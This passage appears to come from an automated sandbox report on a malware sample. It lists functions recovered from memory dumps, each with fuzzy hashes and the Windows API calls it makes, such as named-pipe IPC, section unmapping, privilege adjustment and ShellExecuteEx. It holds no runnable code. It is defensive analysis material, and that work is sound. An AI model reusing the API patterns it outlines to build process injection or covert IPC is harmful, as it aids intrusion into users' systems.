    • Part of subcall function 001C3684: RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C3800
    • Part of subcall function 001C3684: wsprintfA.USER32 ref: 001C3815
    • Part of subcall function 001C3684: lstrlen.KERNEL32(00000000,00000000), ref: 001C3820
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C383A
    • Part of subcall function 001C3684: RtlAllocateHeap.NTDLL(00000000,00000400,001EC206), ref: 001C38C8
    • Part of subcall function 001C3684: wsprintfA.USER32 ref: 001C38DC
    • Part of subcall function 001C3684: lstrlen.KERNEL32(00000000,00000000), ref: 001C38E7
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C3901
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,?,001EC206), ref: 001C3923
    • Part of subcall function 001C3684: RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C393E
    • Part of subcall function 001C3684: wsprintfA.USER32 ref: 001C394E
    • Part of subcall function 001C3684: lstrlen.KERNEL32(00000000,00000000), ref: 001C3959
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C3973
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,?), ref: 001C3988
  • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 001C5668
  • SwitchToThread.KERNEL32 ref: 001C5684
  • ReleaseMutex.KERNEL32(?), ref: 001C568E
    • Part of subcall function 001C5111: WaitForSingleObject.KERNEL32(00002710,00000120), ref: 001C512C
  • WaitForSingleObject.KERNEL32(?,00000000), ref: 001C569E
    • Part of subcall function 001C4349: GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C4356
    • Part of subcall function 001C4349: SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000), ref: 001C4390
    • Part of subcall function 001DD67D: RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DD68A
    • Part of subcall function 001DD67D: Sleep.KERNEL32(0000000A,?,?,001DD703,001EB1C8,001EAD10,00000000,001DDF84), ref: 001DD694
    • Part of subcall function 001DD67D: RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DD6E3
    • Part of subcall function 001C4198: RtlAllocateHeap.NTDLL(00000000,00000010), ref: 001C41BA
    • Part of subcall function 001C4198: HeapFree.KERNEL32(00000000,00000000,00000129), ref: 001C41EB
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C3684, Relevance: 27.3, APIs: 18, Instructions: 264 Total matches: 106memorystring
Similarity
  • Total matches: 106
  • API ID: HeapFree$RtlAllocateHeap$lstrlenwsprintf
  • String ID:
  • API String ID: 2041449020-0
  • Opcode ID: 540e5d8870bfb511a3d1955c9ad0a08f1ccba355172afbf88c2f817bd2b431a8
  • Instruction ID: bba761aa04d3bbfd698f0c8175b6501ca71d3289cc1fe08320dbb8ae1c2a3fdb
  • Opcode Fuzzy Hash: E33169710A8C82D6C42BA8D284B47BE9144B7C18D9C8D2B37FE583D0AD1F8321C66B92
  • Instruction Fuzzy Hash: bba761aa04d3bbfd698f0c8175b6501ca71d3289cc1fe08320dbb8ae1c2a3fdb
APIs
    • Part of subcall function 001C3C55: RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
    • Part of subcall function 001C3C55: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
    • Part of subcall function 001C3C55: HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
    • Part of subcall function 001C3C55: RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
  • HeapFree.KERNEL32(00000000,?,001EC206), ref: 001C36C4
  • RtlAllocateHeap.NTDLL(00000000,00010000,001EC206), ref: 001C36E2
  • HeapFree.KERNEL32(00000000,?), ref: 001C3988
    • Part of subcall function 001CBE3C: GetLastError.KERNEL32(000000FF,00000008,?,000000FF,001EB004,?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000), ref: 001CBE7C
    • Part of subcall function 001CBE3C: CloseHandle.KERNEL32(000000FF), ref: 001CBE87
  • HeapFree.KERNEL32(00000000,00000000,0000011A), ref: 001C3713
    • Part of subcall function 001DDB79: RtlAllocateHeap.NTDLL(00000000,00000800,001E53C8), ref: 001DDB9C
    • Part of subcall function 001DDB79: GetTickCount.KERNEL32(?,00000000,00000001,001E53C8,00000002,?,?), ref: 001DDBB2
    • Part of subcall function 001DDB79: QueryPerformanceFrequency.KERNEL32(?), ref: 001DDC07
    • Part of subcall function 001DDB79: QueryPerformanceCounter.KERNEL32(?), ref: 001DDC11
    • Part of subcall function 001DDB79: _aulldiv.NTDLL(?,?,?,?), ref: 001DDC23
    • Part of subcall function 001DDB79: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 001DDCEB
    • Part of subcall function 001DDB79: GetTickCount.KERNEL32 ref: 001DDCFC
    • Part of subcall function 001DDB79: RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DDD10
    • Part of subcall function 001DDB79: RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DDD2E
    • Part of subcall function 001DDB79: StrTrimA.SHLWAPI(00000000,001E53C8), ref: 001DDD60
    • Part of subcall function 001DDB79: lstrcpy.KERNEL32(?,001ED78A), ref: 001DDD85
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,?,?), ref: 001DDE1F
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,00000000,001ED2CA), ref: 001DDE2E
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,?,00000000), ref: 001DDE3F
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,001ED78A), ref: 001DDE50
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,00000000), ref: 001DDE5F
  • HeapFree.KERNEL32(00000000,001E53C8,0000011B), ref: 001C3788
    • Part of subcall function 001DDB3A: memcpy.NTDLL(001CD4DC,001CD4DC,00000000,001CD4DC,001CD4DC,001CD4DC,00000000,?,?,001C4CB1,00000000,00000001,00000000,001EC1F9,001CD4DC,00000000), ref: 001DDB5D
    • Part of subcall function 001D9692: memset.NTDLL ref: 001D96C0
    • Part of subcall function 001D9692: StrTrimA.SHLWAPI(?,001E53C4), ref: 001D9721
    • Part of subcall function 001D9692: StrTrimA.SHLWAPI(00000001,001E53C4), ref: 001D9740
    • Part of subcall function 001D9692: _strupr.NTDLL ref: 001D9747
    • Part of subcall function 001D9692: StrTrimA.SHLWAPI(?,?), ref: 001D9754
    • Part of subcall function 001D9692: memcpy.NTDLL(00000000,00000000,-00000008,-00000020,00000000,-00000020), ref: 001D979C
    • Part of subcall function 001D9692: lstrlen.KERNEL32(?,00000000,?,?,?,00000000,?,00000000,?), ref: 001D97BB
  • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C3800
  • wsprintfA.USER32 ref: 001C3815
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C3820
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C383A
    • Part of subcall function 001C3CF4: RegCloseKey.ADVAPI32(00000057,?,?,001C27E9,001EC202,00000000,00000000,00000000,001EAC78,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C3D3F
  • RtlAllocateHeap.NTDLL(00000000,00000400,001EC206), ref: 001C38C8
  • wsprintfA.USER32 ref: 001C38DC
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C38E7
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C3901
  • HeapFree.KERNEL32(00000000,?,001EC206), ref: 001C3923
  • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C393E
  • wsprintfA.USER32 ref: 001C394E
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C3959
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C3973
    • Part of subcall function 001C3ACC: RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C3AE8
    • Part of subcall function 001C3ACC: lstrlen.KERNEL32(EMPTY,00000008,001EC4D7,00000000,0000010E,00000000,001C397E,?,?,001C397E), ref: 001C3B26
    • Part of subcall function 001C3ACC: HeapFree.KERNEL32(00000000,00000000,EMPTY), ref: 001C3B3D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D9BD6, Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 208 Total matches: 54filememorytime
Similarity
  • Total matches: 54
  • API ID: FindNextFileHeapFree$CloseHandleCompareFileTimeCreateFileGetFileTimeStrChrStrRChrlstrcatmemcpymemset
  • String ID: [FILE]$}nls
  • API String ID: 2232422578-3867520224
  • Opcode ID: d63c3d0b7d30395697a42598c95896d20b1220c6287163fcac3fa7287f978ce5
  • Instruction ID: 72ed0b863297d3488007a14820031ed271860468cbdb941106eaa0929c179687
  • Opcode Fuzzy Hash: C821E123044BD393D22369821181BA65755FB419E3C0C73F3E9BCB538D4F02A6CA6B96
  • Instruction Fuzzy Hash: 72ed0b863297d3488007a14820031ed271860468cbdb941106eaa0929c179687
APIs
  • memset.NTDLL ref: 001D9C3D
  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001D9C6F
  • GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 001D9C83
  • CloseHandle.KERNEL32(00000094), ref: 001D9C9A
  • StrRChrA.SHLWAPI(00001000,00000000,0000005C), ref: 001D9CA6
  • lstrcat.KERNEL32(00001000,001EDA23), ref: 001D9CE0
  • FindNextFileA.KERNEL32(00000000,?), ref: 001D9D28
  • StrChrA.SHLWAPI(?,0000002E), ref: 001D9D96
  • memcpy.NTDLL(001EB1D4,?,00000000), ref: 001D9DCF
  • FindNextFileA.KERNEL32(00000000,?), ref: 001D9DE4
  • CompareFileTime.KERNEL32(?,?), ref: 001D9E0D
  • HeapFree.KERNEL32(00000000,001EB1D4), ref: 001D9E43
  • HeapFree.KERNEL32(00000000,00001000), ref: 001D9E53
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C7341, Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 76 Total matches: 75stringfilememory
Similarity
  • Total matches: 75
  • API ID: GetLastError$CloseHandleCreateFileCreateFileMappingGetFileSizeGetTickCountHeapFreelstrcpylstrlen
  • String ID: Local\
  • API String ID: 100657750-422136742
  • Opcode ID: f69422c415cb778fefbc06e8825fe91035b8cc03ac1a89af78bf0cef88205365
  • Instruction ID: 66c49fc9188826551a13a81d8cc2f7c2edc845ab8f6028b8dc67af56f16d814c
  • Opcode Fuzzy Hash: 99F02E34B1854287E12374A1016077FDA04E7F20C4D8C7767ED453950A6F0278F7661B
  • Instruction Fuzzy Hash: 66c49fc9188826551a13a81d8cc2f7c2edc845ab8f6028b8dc67af56f16d814c
APIs
  • GetTickCount.KERNEL32(00000000,00000000,00000000,?,001C2BDE,00000000), ref: 001C7351
  • CreateFileW.KERNEL32(001C2BDE,80000000,00000003,001EB0D8,00000003,00000000,00000000), ref: 001C736E
  • GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C740F
    • Part of subcall function 001D937A: lstrlen.KERNEL32(00000000,00000000,?,00000027,?,001EB068,00000000), ref: 001D93B0
    • Part of subcall function 001D937A: lstrcpy.KERNEL32(00000000,00000000), ref: 001D93D4
    • Part of subcall function 001D937A: lstrcat.KERNEL32(00000000,00000000), ref: 001D93DC
  • GetFileSize.KERNEL32(001C2BDE,00000000,Local\,00000001,?,001C2BDE,00000000), ref: 001C739A
  • CreateFileMappingA.KERNEL32(001C2BDE,001EB0D8,00000002,00000000,00000000,001C2BDE), ref: 001C73AE
  • lstrlen.KERNEL32(001C2BDE,?,001C2BDE,00000000), ref: 001C73CA
  • lstrcpy.KERNEL32(?,001C2BDE), ref: 001C73DA
  • GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C73E2
  • HeapFree.KERNEL32(00000000,001C2BDE), ref: 001C73F5
  • CloseHandle.KERNEL32(001C2BDE), ref: 001C7407
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C178D, Relevance: 18.1, APIs: 12, Instructions: 117 Total matches: 53registrythreadsleep
Similarity
  • Total matches: 53
  • API ID: CloseHandleRegCloseKey$CreateEventDeleteFileGetLastErrorRegOpenKeyResumeThreadSetEventSleepSuspendThread
  • String ID:
  • API String ID: 1489053536-0
  • Opcode ID: a04800037acdc991d0ac410cda6be3e7e30f85b4b2334a738cde70afcf2a0bc8
  • Instruction ID: 36a5ddbc87084e266d50b713a62e435bbad551641728e73816c0b0ac65f44fd9
  • Opcode Fuzzy Hash: BB0104704685824B81277464983A3BADA15FF802D5D4D6366FE68B40895F8333DA3F27
  • Instruction Fuzzy Hash: 36a5ddbc87084e266d50b713a62e435bbad551641728e73816c0b0ac65f44fd9
APIs
  • RegOpenKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C17A8
  • CloseHandle.KERNEL32(001EAF58), ref: 001C1809
  • DeleteFileW.KERNEL32(00000000,?,?,?,?,00000000), ref: 001C1816
  • GetLastError.KERNEL32(?,?,?,00000000), ref: 001C1820
  • RegCloseKey.ADVAPI32(?,?,?,?,00000000), ref: 001C187D
  • RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 001C189C
  • SuspendThread.KERNEL32(00000000), ref: 001C18AA
  • CreateEventA.KERNEL32(001EB0D8,00000001,00000000), ref: 001C18BE
  • SetEvent.KERNEL32(00000000), ref: 001C18CB
  • CloseHandle.KERNEL32(00000000), ref: 001C18D2
  • Sleep.KERNEL32(000001F4), ref: 001C18E5
  • ResumeThread.KERNEL32(00000000), ref: 001C1909
    • Part of subcall function 001D9A9C: RegCloseKey.ADVAPI32(?,00000000), ref: 001D9B23
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C1A08, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 122 Total matches: 58memorythreadstring
Similarity
  • Total matches: 58
  • API ID: HeapFree$GetCurrentThreadGetCurrentThreadIdRtlAllocateHeapRtlImageNtHeaderlstrlenwsprintf
  • String ID: W
  • API String ID: 3968678070-655174618
  • Opcode ID: 65c7814ccee3740933dfcccc29e4eab5d936ac043747db4873335771aa46cfd7
  • Instruction ID: 5d65c5167d05eb071b61c740fb2aa7fd16767ced16d889d5a98f858644bbd093
  • Opcode Fuzzy Hash: 8901B138088895A7C06790614063FBFD6017F822D0C4DF712F9693819E2F4372D35B57
  • Instruction Fuzzy Hash: 5d65c5167d05eb071b61c740fb2aa7fd16767ced16d889d5a98f858644bbd093
APIs
  • RtlImageNtHeader.NTDLL ref: 001C1A48
  • GetCurrentThreadId.KERNEL32 ref: 001C1A5E
  • GetCurrentThread.KERNEL32 ref: 001C1A6F
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C1966: lstrlen.KERNEL32(?,00000001,?,?,?,00000001,?,?), ref: 001C19D1
    • Part of subcall function 001C1966: HeapFree.KERNEL32(00000000,00000000), ref: 001C19F9
  • HeapFree.KERNEL32(00000000,?,00000000), ref: 001C1AE3
  • HeapFree.KERNEL32(00000000,00000020,00000000), ref: 001C1AF3
  • RtlAllocateHeap.NTDLL(00000000,00000400), ref: 001C1B3F
  • wsprintfA.USER32 ref: 001C1B50
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C1B5B
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C1B75
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B32CD0, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 108 Total matches: 183string
Similarity
  • Total matches: 183
  • API ID: lstrcpy$CoInitializeExCoUninitializePathFindExtensionShellExecuteExlstrlenmemsetwsprintf
  • String ID: <
  • API String ID: 1457465641-4251816714
  • Opcode ID: 36c43c169b7f4adfcc7eed8db55d242cf47c4c2cff2d35238d5400cc3024a577
  • Instruction ID: 3de0f454e75166d7dc89cb568257ea8f04ae800c90f99e8cafab956dcc2645f6
  • Opcode Fuzzy Hash: 93F078708B2E8BC1CD9158C9160535692C06F30E68E9C9B137824F966B6B20312C9F9D
  • Instruction Fuzzy Hash: 3de0f454e75166d7dc89cb568257ea8f04ae800c90f99e8cafab956dcc2645f6
APIs
  • memset.NTDLL ref: 01B32CEE
  • CoInitializeEx.OLE32(00000000,00000002), ref: 01B32CF9
  • PathFindExtensionW.SHLWAPI(00000000), ref: 01B32D14
  • lstrcpyW.KERNEL32(00000000,01B38224), ref: 01B32D29
  • lstrlen.KERNEL32(01B37494,?,?,?,?,?,?,?,?,?,?,01B318D7,?), ref: 01B32D46
  • lstrcpyW.KERNEL32(00000000,01B384B8), ref: 01B32D77
    • Part of subcall function 01B3115C: RtlAllocateHeap.NTDLL(00000000,?,01B33CA0), ref: 01B31168
  • wsprintfW.USER32 ref: 01B32DAE
  • ShellExecuteExW.SHELL32(0000003C), ref: 01B32DE3
  • CoUninitialize.OLE32 ref: 01B32DF7
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
Strings
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001DB47B, Relevance: 16.7, APIs: 11, Instructions: 187 Total matches: 59synchronizationstring
Similarity
  • Total matches: 59
  • API ID: GetLastError$WaitForSingleObject$ReleaseMutexlstrcpynmemcpymemset
  • String ID:
  • API String ID: 1576942631-0
  • Opcode ID: bbb80d9d18486b754104cd36c0130e3b39926c5d582aef500eb7a1e8a66222a2
  • Instruction ID: ec06ce50e56994e4f65fca86296eb1a4dcbc1b1930a3dec25b055dcee645f614
  • Opcode Fuzzy Hash: 4A217F33157A22D745163840C0507BEF482FB825E694CB711FE21722DE4A8197F6AFDD
  • Instruction Fuzzy Hash: ec06ce50e56994e4f65fca86296eb1a4dcbc1b1930a3dec25b055dcee645f614
APIs
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 001DB4AE
  • memcpy.NTDLL(?,?,00000010), ref: 001DB4D1
  • memset.NTDLL ref: 001DB51D
  • lstrcpyn.KERNEL32(?,?,00000034), ref: 001DB531
  • GetLastError.KERNEL32 ref: 001DB55F
  • GetLastError.KERNEL32 ref: 001DB5A2
    • Part of subcall function 001DAF5A: InterlockedExchange.KERNEL32(001C13EB,000000FF), ref: 001DAF61
  • GetLastError.KERNEL32 ref: 001DB5C1
  • WaitForSingleObject.KERNEL32(?,000927C0), ref: 001DB5FB
  • WaitForSingleObject.KERNEL32(?,00000000), ref: 001DB609
    • Part of subcall function 001DB350: memset.NTDLL ref: 001DB398
    • Part of subcall function 001DB350: QueueUserWorkItem.KERNEL32(001DAFC4,?,00000010), ref: 001DB439
    • Part of subcall function 001DB350: GetLastError.KERNEL32 ref: 001DB443
  • GetLastError.KERNEL32 ref: 001DB67E
  • ReleaseMutex.KERNEL32(?), ref: 001DB690
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C1586, Relevance: 16.6, APIs: 11, Instructions: 78 Total matches: 43memoryfile
Similarity
  • Total matches: 43
  • API ID: GetLastError$CloseHandleCreateFileGetModuleHandleGetWindowsDirectoryHeapFreeRtlAllocateHeapStrChrWriteFilewsprintf
  • String ID:
  • API String ID: 2627060994-0
  • Opcode ID: db8d6b5184187aba615ed9859a1217546e47d51c2a19850b1dde47917d77b9bd
  • Instruction ID: df8b16018d32c17adcafddecac367e62ad292682b52cd612f4b16c26ee5ce5b9
  • Opcode Fuzzy Hash: 00E05538564C02C3C4279AA888803BEDA41B3801C1E8E0212FA002A5BAAB0323C88F63
  • Instruction Fuzzy Hash: df8b16018d32c17adcafddecac367e62ad292682b52cd612f4b16c26ee5ce5b9
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000104,00000000), ref: 001C159D
  • GetWindowsDirectoryA.KERNEL32(00000000,00000104,?,00000000,?,001C2CDE,00000094,00000000), ref: 001C15AF
  • StrChrA.SHLWAPI(00000000,0000003A), ref: 001C15BC
  • wsprintfA.USER32 ref: 001C15D0
  • CreateFileA.KERNEL32(00000002,C0000000,00000003,00000000,00000003,00000000,00000000), ref: 001C15E6
  • GetModuleHandleA.KERNEL32(00000000,00010000,?,00000000), ref: 001C15FF
  • WriteFile.KERNEL32(00000000,00000000), ref: 001C1607
  • GetLastError.KERNEL32 ref: 001C1615
  • CloseHandle.KERNEL32(00000000), ref: 001C161E
    • Part of subcall function 001C154D: RtlAdjustPrivilege.NTDLL(00000013,00000001,00000000,?), ref: 001C155B
    • Part of subcall function 001C154D: GetLastError.KERNEL32(?,001C2CD4), ref: 001C1572
  • GetLastError.KERNEL32(?,00000000,?,001C2CDE,00000094,00000000), ref: 001C162F
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C163F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C20A7, Relevance: 15.2, APIs: 10, Instructions: 171 Total matches: 60memorystringthread
Similarity
  • Total matches: 60
  • API ID: HeapFree$lstrlenmemcpy$RtlAllocateHeapSwitchToThreadlstrcpy
  • String ID:
  • API String ID: 732536130-0
  • Opcode ID: a427ae31280889244c8d76e620d9b5f9788be67866348582a82e8a58517c2dc5
  • Instruction ID: a2cec6491fe12f34e3abab1a275dd9d209e051195fd81796f6ed6d95fe43367f
  • Opcode Fuzzy Hash: 90116D11582D32C3D113B46AC1E8B7EFA45FF961D6C1F3001E9127510E4A935EF6AB6E
  • Instruction Fuzzy Hash: a2cec6491fe12f34e3abab1a275dd9d209e051195fd81796f6ed6d95fe43367f
APIs
    • Part of subcall function 001C3B4A: HeapFree.KERNEL32(00000000,?,?), ref: 001C3BCD
  • lstrlen.KERNEL32(?,?,?,00000001), ref: 001C216D
  • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001C218F
  • lstrcpy.KERNEL32(00000020,?), ref: 001C21AE
  • lstrlen.KERNEL32(?), ref: 001C21B8
  • memcpy.NTDLL(?,?,?), ref: 001C21F9
  • memcpy.NTDLL(?,?,?), ref: 001C220C
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C224F
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
  • SwitchToThread.KERNEL32(?,00000000,?,?), ref: 001C2230
    • Part of subcall function 001C2B66: memset.NTDLL ref: 001C2BCA
    • Part of subcall function 001C2B66: CloseHandle.KERNEL32(?), ref: 001C2C13
    • Part of subcall function 001C2B66: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C2DC7
    • Part of subcall function 001C2B66: GetLastError.KERNEL32(?,00000000,?), ref: 001C3013
  • HeapFree.KERNEL32(00000000,?,?), ref: 001C2275
  • HeapFree.KERNEL32(00000000,?,?), ref: 001C2291
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CBB92, Relevance: 15.1, APIs: 10, Instructions: 109 Total matches: 83pipesynchronization
Similarity
  • Total matches: 83
  • API ID: CloseHandleGetLastError$ConnectNamedPipeCreateEventDisconnectNamedPipeFlushFileBuffersWaitForMultipleObjectsWaitForSingleObject
  • String ID:
  • API String ID: 4178450735-0
  • Opcode ID: fea2056c6ced76e25bc66d29ae2c0ef00b9ab400e991bc076a25110f2a978033
  • Instruction ID: 05167e17d539e8951b2ec5fe1b97e76cff5c88daf7da0f392f1248a609e86f53
  • Opcode Fuzzy Hash: 34F07B324973A09BC12724748146BBA7A46FF612E7D8C7302ECB0B518E1F05A6F65369
  • Instruction Fuzzy Hash: 05167e17d539e8951b2ec5fe1b97e76cff5c88daf7da0f392f1248a609e86f53
APIs
  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 001CBBD2
  • ConnectNamedPipe.KERNEL32(?,?), ref: 001CBC02
  • GetLastError.KERNEL32 ref: 001CBC0C
  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001CBC30
    • Part of subcall function 001CB978: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000001,00000000,001CBA84,00000008,?,00000010,00000001,00000000,0000012B), ref: 001CB997
    • Part of subcall function 001CB978: WriteFile.KERNEL32(?,00000001,?,?,?), ref: 001CB9CB
    • Part of subcall function 001CB978: ReadFile.KERNEL32(?,00000001,?,?,?), ref: 001CB9D3
    • Part of subcall function 001CB978: GetLastError.KERNEL32 ref: 001CB9DD
    • Part of subcall function 001CB978: WaitForMultipleObjects.KERNEL32(00000002,00000000,00000000,00002710), ref: 001CB9F9
    • Part of subcall function 001CB978: GetOverlappedResult.KERNEL32(?,?,?,00000000), ref: 001CBA12
    • Part of subcall function 001CB978: CancelIo.KERNEL32(?), ref: 001CBA27
    • Part of subcall function 001CB978: CloseHandle.KERNEL32(?), ref: 001CBA37
    • Part of subcall function 001CB978: GetLastError.KERNEL32 ref: 001CBA3F
  • CloseHandle.KERNEL32(?), ref: 001CBC9E
    • Part of subcall function 001CBB13: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CBB31
    • Part of subcall function 001CBB13: HeapFree.KERNEL32(00000000,00000000), ref: 001CBB84
  • FlushFileBuffers.KERNEL32(?), ref: 001CBC73
  • DisconnectNamedPipe.KERNEL32(?,?,?,00000010,00000000), ref: 001CBC7C
  • WaitForSingleObject.KERNEL32(001EB094,00000000), ref: 001CBC89
  • GetLastError.KERNEL32 ref: 001CBCAB
  • CloseHandle.KERNEL32(?), ref: 001CBCB8
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DB838, Relevance: 15.1, APIs: 10, Instructions: 64 Total matches: 62sleepsynchronization
Similarity
  • Total matches: 62
